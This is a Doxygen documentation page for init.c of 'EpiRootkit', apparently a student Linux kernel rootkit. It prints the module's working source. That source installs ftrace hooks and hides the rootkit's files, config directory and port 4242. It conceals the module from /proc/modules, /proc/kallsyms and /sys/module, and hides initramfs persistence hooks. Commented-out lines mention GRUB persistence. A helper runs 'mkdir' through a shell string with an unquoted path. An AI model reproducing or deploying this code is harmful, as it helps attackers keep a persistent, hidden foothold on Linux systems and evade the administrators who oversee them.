EpiRootkit
By STDBOOL
Loading...
Searching...
No Matches
Macros | Functions
init.c File Reference
#include "init.h"
#include "alterate_api.h"
#include "epirootkit.h"
#include "forbid_api.h"
#include "ftrace.h"
#include "hide_api.h"
Include dependency graph for init.c:

Go to the source code of this file.

Macros

#define HIDE_CFG_FILE_FULL_PATH   HIDDEN_DIR_PATH "/" HIDE_CFG_FILE
 
#define FORBID_CFG_FILE_FULL_PATH   HIDDEN_DIR_PATH "/" FORBID_CFG_FILE
 
#define ALTERATE_CFG_FILE_FULL_PATH   HIDDEN_DIR_PATH "/" ALTERATE_CFG_FILE
 
#define HIDE_PORT_CFG_FILE_FULL_PATH   HIDDEN_DIR_PATH "/" HIDE_PORT_CFG_FILE
 

Functions

int init_interceptor (void)
 
void exit_interceptor (void)
 
int create_dir (char *path)
 

Macro Definition Documentation

◆ ALTERATE_CFG_FILE_FULL_PATH

#define ALTERATE_CFG_FILE_FULL_PATH   HIDDEN_DIR_PATH "/" ALTERATE_CFG_FILE

Definition at line 11 of file init.c.

◆ FORBID_CFG_FILE_FULL_PATH

#define FORBID_CFG_FILE_FULL_PATH   HIDDEN_DIR_PATH "/" FORBID_CFG_FILE

Definition at line 10 of file init.c.

◆ HIDE_CFG_FILE_FULL_PATH

#define HIDE_CFG_FILE_FULL_PATH   HIDDEN_DIR_PATH "/" HIDE_CFG_FILE

Definition at line 9 of file init.c.

◆ HIDE_PORT_CFG_FILE_FULL_PATH

#define HIDE_PORT_CFG_FILE_FULL_PATH   HIDDEN_DIR_PATH "/" HIDE_PORT_CFG_FILE

Definition at line 12 of file init.c.

Function Documentation

◆ create_dir()

int create_dir ( char *  path)

Definition at line 107 of file init.c.

107 {
108 char cmd[128];
109 int rc;
110
111 snprintf(cmd, sizeof(cmd), "mkdir -p -- %s", path);
112 rc = exec_str_as_command_no_timeout(cmd, false);
113 if (rc < 0)
114 return rc;
115
116 return SUCCESS;
117}
SUCCESS
#define SUCCESS
Definition config.h:5
exec_str_as_command_no_timeout
#define exec_str_as_command_no_timeout(user_cmd, catch_stds)
Definition epirootkit.h:38

◆ exit_interceptor()

void exit_interceptor ( void  )

Definition at line 99 of file init.c.

99 {
100 fh_remove_hooks(hooks, hook_array_size);
101
102 hide_exit();
103 forbid_exit();
104 hide_exit();
105}
hooks
struct ftrace_hook hooks[]
Definition array.c:6
hook_array_size
size_t hook_array_size
Definition array.c:22
forbid_exit
void forbid_exit(void)
Definition forbid_api.c:19
fh_remove_hooks
void fh_remove_hooks(struct ftrace_hook *hooks, size_t count)
Remove multiple ftrace hooks.
Definition ftrace.c:136
hide_exit
void hide_exit(void)
Definition hide_api.c:20

◆ init_interceptor()

int init_interceptor ( void  )

Definition at line 14 of file init.c.

14 {
15 int err;
16
17 err = create_dir(HIDDEN_DIR_PATH);
18 if (err) {
19 ERR_MSG("init: mkdir %s failed: %d\n", HIDDEN_DIR_PATH, err);
20 return err;
21 }
22
23 err = alterate_init();
24 if (err) {
25 ERR_MSG("init: alterate_init() failed: %d\n", err);
26 return err;
27 }
28
29 err = forbid_init();
30 if (err) {
31 ERR_MSG("init: forbid_init() failed: %d\n", err);
32 return err;
33 }
34
35 err = hide_init();
36 if (err) {
37 ERR_MSG("init: hide_init() failed: %d\n", err);
38 return err;
39 }
40
41 err = hide_port_init();
42 if (err) {
43 ERR_MSG("init: hide_port_init() failed: %d\n", err);
44 return err;
45 }
46
47 err = fh_install_hooks(hooks, hook_array_size);
48 if (err) {
49 ERR_MSG("init: failed to install hooks\n");
50 return err;
51 }
52
53 // Hide directory HIDDEN_DIR_PATH
54 hide_file(HIDDEN_DIR_PATH);
55 hide_file(HIDE_CFG_FILE_FULL_PATH);
56 hide_file(FORBID_CFG_FILE_FULL_PATH);
57 hide_file(ALTERATE_CFG_FILE_FULL_PATH);
58 hide_file(HIDE_PORT_CFG_FILE_FULL_PATH);
59
60 // Forbid access to HIDDEN_DIR_PATH
61 forbid_file(HIDDEN_DIR_PATH);
62 forbid_file(HIDE_CFG_FILE_FULL_PATH);
63 forbid_file(FORBID_CFG_FILE_FULL_PATH);
64 forbid_file(ALTERATE_CFG_FILE_FULL_PATH);
65 forbid_file(HIDE_PORT_CFG_FILE_FULL_PATH);
66
67 // Hide module in /sys/modules
68 hide_file("/sys/module/epirootkit");
69
70 // Hide module in /proc/kallsyms
71 alterate_add("/proc/kallsyms", -1, "epirootkit", NULL, NULL);
72
73 // General hiding for epirootkit module file in base64
74 hide_file("/usr/lib/epirootkit/cH0c01AtcG9ydC1rZXlzLmNv");
75 hide_file("/usr/lib/epirootkit");
76
77 // Hide grub peristence stuff
78 // hide_file("/.grub.sh");
79 // hide_file("/etc/default/grub.d/99.cfg");
80 // forbid_file("/.grub.sh");
81 // forbid_file("/etc/default/grub.d/99.cfg");
82
83 // Hide initramfs persistence stuff
84 hide_file("/etc/initramfs-tools/hooks/epirootkit");
85 hide_file("/etc/initramfs-tools/scripts/init-premount/epirootkit-load");
86 hide_file("/tmp/insmod.err");
87
88 // Hide ports
89 hide_port("4242");
90
91// Hide module in /proc/modules
92#if !(defined(DEBUG) && DEBUG)
93 hide_module();
94#endif
95
96 return SUCCESS;
97}
alterate_init
int alterate_init(void)
Definition alterate_api.c:8
alterate_add
int alterate_add(const char *path, int hide_line, const char *hide_substr, const char *src, const char *dst)
Definition alterate_api.c:23
ERR_MSG
#define ERR_MSG(fmt, args...)
Definition config.h:16
HIDDEN_DIR_PATH
#define HIDDEN_DIR_PATH
Definition config.h:56
hide_module
int hide_module(void)
Definition ghost.c:7
forbid_file
int forbid_file(const char *path)
Definition forbid_api.c:24
forbid_init
int forbid_init(void)
Definition forbid_api.c:8
fh_install_hooks
int fh_install_hooks(struct ftrace_hook *hooks, size_t count)
Install multiple ftrace hooks.
Definition ftrace.c:116
hide_file
int hide_file(const char *path)
Definition hide_api.c:25
hide_port
int hide_port(const char *port)
Definition hide_api.c:90
hide_port_init
int hide_port_init(void)
Definition hide_api.c:74
hide_init
int hide_init(void)
Definition hide_api.c:9
create_dir
int create_dir(char *path)
Definition init.c:107
FORBID_CFG_FILE_FULL_PATH
#define FORBID_CFG_FILE_FULL_PATH
Definition init.c:10
ALTERATE_CFG_FILE_FULL_PATH
#define ALTERATE_CFG_FILE_FULL_PATH
Definition init.c:11
HIDE_CFG_FILE_FULL_PATH
#define HIDE_CFG_FILE_FULL_PATH
Definition init.c:9
HIDE_PORT_CFG_FILE_FULL_PATH
#define HIDE_PORT_CFG_FILE_FULL_PATH
Definition init.c:12